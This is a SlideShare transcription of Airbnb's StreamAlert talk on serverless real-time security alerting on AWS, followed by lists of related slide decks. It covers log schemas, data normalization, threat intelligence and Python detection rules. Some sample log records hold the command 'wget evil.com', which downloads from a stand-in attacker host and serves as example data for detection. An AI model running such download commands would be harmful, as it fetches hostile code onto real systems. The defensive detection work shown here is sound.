SlideShare ist ein Scribd-Unternehmen logo

Airbnb - StreamAlert

Amazon Web Services
Amazon Web Services

by Lin Chunyong and Ryan Deivert, Airbnb AWS Data & Analytics Week is an opportunity to learn about Amazon’s family of managed analytics services. These services provide easy, scalable, reliable, and cost-effective ways to manage your data in the cloud. We explain the fundamentals and take a technical deep dive into Amazon Redshift data warehouse; Data Lake services including Amazon EMR, Amazon Athena, & Amazon Redshift Spectrum; Log Analytics with Amazon Elasticsearch Service; and data preparation and placement services with AWS Glue and Amazon Kinesis. You'll will learn how to get started, how to support applications, and how to scale.

1 von 30
StreamAlert Serverless, Real-time, Data Analysis CHUNYONG LIN / RYAN DEIVERT / 7 JUNE 2018
1. Who Are We 2. What is StreamAlert 3. Data Normalization 4. Threat Intel 5. StreamAlert Apps 6. The Future
1. Who Are We Ryan Deivert CSIRT Engineer Chunyong Lin CSIRT Engineer Austin Byers CSIRT Engineer Awesome You CSIRT Engineer Jack Naglieri CSIRT Engineering Manager CSIRT Engineering
1. Who Are We 2. StreamAlert Incoming Data Kinesis SNS S3 StreamAlert Apps Outgoing Alerts Lambda Slack PagerDuty S3 StreamAlert Serverless real-time data analysis streamalert.io github.com/airbnb/streamalert
Why StreamAlert? ● Serverless ● Real-time alerting ● Scalable ● Infrastructure as code ● Simple deployment ● Extensive data format support ○ CSV, JSON, key-value, syslog ● Support for different use-cases ○ Security monitoring, compliance, ops 1. Who Are We 2. StreamAlert
{ "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } Incoming Log & Schema { "cloudwatch:events": { "schema": { "account": "string", "detail": {}, "detail-type": "string", "id": "string", "region": "string", "resources": [], "source": "string", "time": "string", "version": "string" }, "parser": "json" } } { "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } 1. Who Are We 2. StreamAlert
from stream_alert.shared.rule import rule @rule(logs=['ghe:general'], outputs=['slack:alerts']) def github_disable_two_factor_requirement_user(rec): """ Alert if two-factor authentication requirement was disabled for a user. """ return rec['action'] == 'two_factor_authentication.disabled' Simple Python Rule 1. Who Are We 2. StreamAlert
{ "account": "123456", "detail": { "awsRegion": "us-west-2", "eventID": "11111", "eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com", "eventTime": "2018-06-07T00:00:00Z", "eventType": "AwsConsoleSignIn" }, "detail-type": "type", "id": "11111", "region": "us-west-2", "resources": [], "source": "source_stream_name", "time": "2018-06-07T00:00:00Z", "version": "1.0" } Incoming Log 1. Who Are We 2. StreamAlert
from stream_alert.shared.rule import rule @rule(logs=['cloudwatch:events'], req_subkeys={'detail': ['userIdentity', 'eventType']}) def cloudtrail_root_account_usage(rec): """Alert when root AWS credentials are used.""" return (rec['detail']['userIdentity']['type'] == 'Root' and rec['detail']['userIdentity'].get('invokedBy') is None and rec['detail']['eventType'] != 'AwsServiceEvent') More Complex Python Rule 1. Who Are We 2. StreamAlert
● CloudWatch Logs & Events Rules ● S3 Buckets & Event Notifications ● Kinesis Streams and Firehose ● Simple Notification Service AWS Services for Incoming Data 1. Who Are We 2. StreamAlert
● Lambda ● DynamoDB ● System Manager Parameter Store AWS Services for Rule Processing 1. Who Are We 2. StreamAlert
● S3 Bucket ● Athena ● Simple Queue Service ● Lambda Function AWS Services for Output 1. Who Are We 2. StreamAlert
Real-Time Data Analysis Classify, Normalize, Enrich, and Process Rules Alert Dispatching Alerts Alert Merging Data Enrichment and Rule State IOCs Rule Metadata Outgoing Alerts Lambda Slack PagerDuty S3 Historical Search Partitioning Kinesis Firehose S3 Athena S3 Events Laptops, Workstations, Servers SaaS Applications APIs Other Incoming Data Kinesis SNS S3 StreamAlert Apps
1. Who Are We 2. StreamAlert Alert Searching via Athena
{ "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } { "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } 1. Who Are We 2. StreamAlert 3. Normalization { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } Log 1 from log_source_1: Log 2 from log_source_2: { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } The Problem
from stream_alert.shared.rule import rule BAD_IP = '1.2.3.4' @rule(logs=['log_source_1']) def bad_ip_address_log_source_1(rec): """Alert on the record from bad ip address from log_source_1""" return rec['remote_ip'] == BAD_IP { "server": "cylin_server", "command_line": "wget evil.com", "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4" } Log 1 from log_source_1: from stream_alert.shared.rule import rule BAD_IP = '1.2.3.4' @rule(logs=['log_source_2']) def bad_ip_address_log_source_2(rec): """Alert on the record from bad ip address from log_source_2""" return rec['destinationAddress'] == BAD_IP { "destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp", "cmdline": "wget -b evil.com", "pid": "1234" } Log 2 from log_source_2:
"computer_name" "hostIdentifier" "command_line" "cmdline" "remote_ip" "destinationAddress" "hostName" "command" "ipAddress" The Solution 1. Who Are We 2. StreamAlert 3. Normalization
from stream_alert.shared.rule import rule from helpers.base import fetch_values_by_datatype BAD_IP = '1.2.3.4' @rule(datatypes=['ipAddress']) def bad_ip_address(rec): """Alert on the record from bad ip address.""" ip_addresses = fetch_values_by_datatype(rec, 'ipAddress') return BAD_IP in ip_addresses Example Rule, Normalization 1. Who Are We 2. StreamAlert 3. Normalization
Potential Considerations ● Too many bad ip addresses ● Lambda memory limitation ● How to update with new IOCs ● How to resolve False Positives 1. Who Are We 2. StreamAlert 3. Normalization
Classify & Normalize IOCs ● File hashes ● Domains ● IP addresses 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel
from stream_alert.shared.rule import rule, disable from stream_alert.rule_processor.threat_intel import StreamThreatIntel @rule(datatypes=['ipAddress']) def threat_intel_ioc_match_ip_address(rec): """Alert on the record from bad ip address.""" if (StreamThreatIntel.IOC_KEY in rec and rec[StreamThreatIntel.IOC_KEY].get('ip')): return True return False Example Rule, Threat Intelligence 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel
StreamAlert Rule Processor StreamAlert Apps SSM Parameter Store App Lambda CloudWatch Scheduled Event More SaaS applications 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps
1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps Apps in Action
from stream_alert.shared.rule import rule @rule(logs=['duo:authentication']) def duo_fraud(rec): """Alert on any Duo authentication marked as fraud.""" return rec['result'] == 'FRAUD' Duo Push notification marked as fraudulent by the end user 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from stream_alert.shared.rule import rule @rule(logs=['duo:authentication']) def duo_fraud(rec): """Alert on any Duo authentication marked as fraud.""" return rec['result'] == 'FRAUD'
from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES) Box Box login with email outside of the trusted domain 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES) from helpers.base import ends_with_any from stream_alert.shared.rule import rule _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'} @rule(logs=['box:admin_events']) def box_events_non_domain_email(rec): """Alert on box logins with untrusted email addresses""" if rec['event_type'] != 'LOGIN': return False email = rec['created_by'].get('login') return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
from stream_alert.shared.rule import rule @rule(logs=['gsuite:reports']) def gsuite_suspicious_logons(rec): """Alert on suspicious G Suite logins""" if rec['id']['applicationName'] != 'login': return False for event in rec['events']: if event.get('name') == 'login_challenge': for param in event.get('parameters', []): if (param.get('name') == 'login_challenge_status' and param.get(value) == 'Challenge Failed.'): return True return False G Suite G Suite user failed challenge during login 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps from stream_alert.shared.rule import rule @rule(logs=['gsuite:reports']) def gsuite_suspicious_logons(rec): """Alert on suspicious G Suite logins""" if rec['id']['applicationName'] != 'login': return False for event in rec['events']: if event.get('name') == 'login_challenge': for param in event.get('parameters', []): if (param.get('name') == 'login_challenge_status' and param.get(value) == 'Challenge Failed.'): return True return False
Alert in PagerDuty 1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps
1. Who Are We 2. StreamAlert 3. Normalization 4. Threat Intel 5. Apps 6. The Future In Progress ● Alert merging ● Rule “baking”
WE ARE HIRING!!! https://goo.gl/6ZTvFJ Awesome You CSIRT Engineer
QUESTIONS? @jacknagz @ryandeivert @austinbyers @chunyong-lin All third party names and trademarks are the property of their respective owners

Empfohlen

Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the LakeAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 
Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the LakeAmazon Web Services
 
Log Analytics with AWS
Log Analytics with AWSLog Analytics with AWS
Log Analytics with AWSAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 
How Amazon.com uses AWS Analytics
How Amazon.com uses AWS AnalyticsHow Amazon.com uses AWS Analytics
How Amazon.com uses AWS AnalyticsAmazon Web Services
 
Visualization with Amazon QuickSight
Visualization with Amazon QuickSightVisualization with Amazon QuickSight
Visualization with Amazon QuickSightAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 

Empfohlen

Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the LakeAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 
Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the LakeAmazon Web Services
 
Log Analytics with AWS
Log Analytics with AWSLog Analytics with AWS
Log Analytics with AWSAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 
How Amazon.com uses AWS Analytics
How Amazon.com uses AWS AnalyticsHow Amazon.com uses AWS Analytics
How Amazon.com uses AWS AnalyticsAmazon Web Services
 
Visualization with Amazon QuickSight
Visualization with Amazon QuickSightVisualization with Amazon QuickSight
Visualization with Amazon QuickSightAmazon Web Services
 
Analyzing Streams
Analyzing StreamsAnalyzing Streams
Analyzing StreamsAmazon Web Services
 
Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the LakeAmazon Web Services
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data LakesAmazon Web Services
 
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018Amazon Web Services
 
Data Warehouses and Data Lakes
Data Warehouses and Data LakesData Warehouses and Data Lakes
Data Warehouses and Data LakesAmazon Web Services
 
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...Amazon Web Services
 
Visualization with Amazon QuickSight
Visualization with Amazon QuickSightVisualization with Amazon QuickSight
Visualization with Amazon QuickSightAmazon Web Services
 
Loading Data into Amazon Redshift
Loading Data into Amazon RedshiftLoading Data into Amazon Redshift
Loading Data into Amazon RedshiftAmazon Web Services
 
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...Amazon Web Services
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data LakesAmazon Web Services
 
How Amazon uses AWS Analytics
How Amazon uses AWS AnalyticsHow Amazon uses AWS Analytics
How Amazon uses AWS AnalyticsAmazon Web Services
 
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...Amazon Web Services
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data LakesAmazon Web Services
 
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...Amazon Web Services
 
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...Amazon Web Services
 
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...Amazon Web Services
 
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...Amazon Web Services
 
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018Amazon Web Services
 
Data Warehouses and Data Lakes
Data Warehouses and Data LakesData Warehouses and Data Lakes
Data Warehouses and Data LakesAmazon Web Services
 
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018Amazon Web Services
 
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...Amazon Web Services
 
Sumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security AnalyticsSumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security AnalyticsSumo Logic
 
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...Amazon Web Services
 

Weitere ähnliche Inhalte

Was ist angesagt?

Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018Amazon Web Services
 
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...Amazon Web Services
 
Visualization with Amazon QuickSight
Visualization with Amazon QuickSightVisualization with Amazon QuickSight
Visualization with Amazon QuickSightAmazon Web Services
 
Loading Data into Amazon Redshift
Loading Data into Amazon RedshiftLoading Data into Amazon Redshift
Loading Data into Amazon RedshiftAmazon Web Services
 
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...Amazon Web Services
 
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...Amazon Web Services
 
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...Amazon Web Services
 
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...Amazon Web Services
 
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...Amazon Web Services
 
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...Amazon Web Services
 
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018Amazon Web Services
 
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018Amazon Web Services
 
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...Amazon Web Services
 

Was ist angesagt? (20)

Preparing Data for the Lake
Preparing Data for the LakePreparing Data for the Lake
Preparing Data for the Lake
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data Lakes
 
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
Build Your First Big Data Application on AWS (ANT213-R1) - AWS re:Invent 2018
 
Data Warehouses and Data Lakes
Data Warehouses and Data LakesData Warehouses and Data Lakes
Data Warehouses and Data Lakes
 
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
Amazon Athena: What's New and How SendGrid Innovates (ANT324) - AWS re:Invent...
 
Visualization with Amazon QuickSight
Visualization with Amazon QuickSightVisualization with Amazon QuickSight
Visualization with Amazon QuickSight
 
Loading Data into Amazon Redshift
Loading Data into Amazon RedshiftLoading Data into Amazon Redshift
Loading Data into Amazon Redshift
 
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
ABD318_Architecting a data lake with Amazon S3, Amazon Kinesis, AWS Glue and ...
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data Lakes
 
How Amazon uses AWS Analytics
How Amazon uses AWS AnalyticsHow Amazon uses AWS Analytics
How Amazon uses AWS Analytics
 
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
Building Data Lakes and Analytics on AWS; Patterns and Best Practices - BDA30...
 
Using Data Lakes
Using Data LakesUsing Data Lakes
Using Data Lakes
 
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
Bridge OLTP and Stream Processing with Amazon Kinesis, AWS Lambda, & MongoDB ...
 
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
Modern Cloud Data Warehousing ft. Equinox Fitness Clubs: Optimize Analytics P...
 
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
(BDT306) Mission-Critical Stream Processing with Amazon EMR and Amazon Kinesi...
 
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
Building Data Lakes That Cost Less and Deliver Results Faster - AWS Online Te...
 
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
What's New with Amazon Redshift ft. Dow Jones (ANT350-R) - AWS re:Invent 2018
 
Data Warehouses and Data Lakes
Data Warehouses and Data LakesData Warehouses and Data Lakes
Data Warehouses and Data Lakes
 
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
Build Data Engineering Platforms with Amazon EMR (ANT204) - AWS re:Invent 2018
 
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
Data Patterns and Analysis with Amazon Neptune: A Case Study in Healthcare Bi...
 

Ähnlich wie Airbnb - StreamAlert

Sumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security AnalyticsSumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security AnalyticsSumo Logic
 
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...Amazon Web Services
 
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...
AMIRA: Automated Malware Incident Response and Analysis (Black Hat USA Arsena...Jakub "Kuba" Sendor
 
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...
Practice Fusion & MongoDB: Transitioning a 4 TB Audit Log from SQL Server to ...MongoDB
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"SE2016 Android Denis Zhuchinski "Ways of enhancing application security"
SE2016 Android Denis Zhuchinski "Ways of enhancing application security"Inhacking
 
ZMON: Monitoring Zalando's Engineering Platform
ZMON: Monitoring Zalando's Engineering PlatformZMON: Monitoring Zalando's Engineering Platform
ZMON: Monitoring Zalando's Engineering PlatformZalando Technology
 
PyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonPyCon 2019 - A Snake in the Bits: Security Automation with Python
PyCon 2019 - A Snake in the Bits: Security Automation with PythonMoses Schwartz
 
Un-broken Logging - TechnologyUG - Leeds - Matthew Skelton
Un-broken Logging - TechnologyUG - Leeds - Matthew SkeltonUn-broken Logging - TechnologyUG - Leeds - Matthew Skelton
Un-broken Logging - TechnologyUG - Leeds - Matthew SkeltonSkelton Thatcher Consulting Ltd
 
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...
AMIRA: Automated Malware Incident Response and Analysis for macOS (Black Hat ...Jakub "Kuba" Sendor
 
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backend
2022 APIsecure_Method for exploiting IDOR on nodejs+mongodb based backendAPIsecure_ Official
 
Security Certification: Security Analytics using Sumo Logic - Oct 2018
Security Certification: Security Analytics using Sumo Logic - Oct 2018Security Certification: Security Analytics using Sumo Logic - Oct 2018
Security Certification: Security Analytics using Sumo Logic - Oct 2018Sumo Logic
 
Webinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDBWebinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDBMongoDB
 
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsStarted from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsJamieWilliams130
 
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyAWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyChris Farris
 

Ähnlich wie Airbnb - StreamAlert (20)

Sumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security AnalyticsSumo Logic Cert Jam - Security Analytics
Sumo Logic Cert Jam - Security Analytics
 
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...Scalable, Automated Anomaly Detection with GuardDuty, CloudTrail, & Amazon Sa...
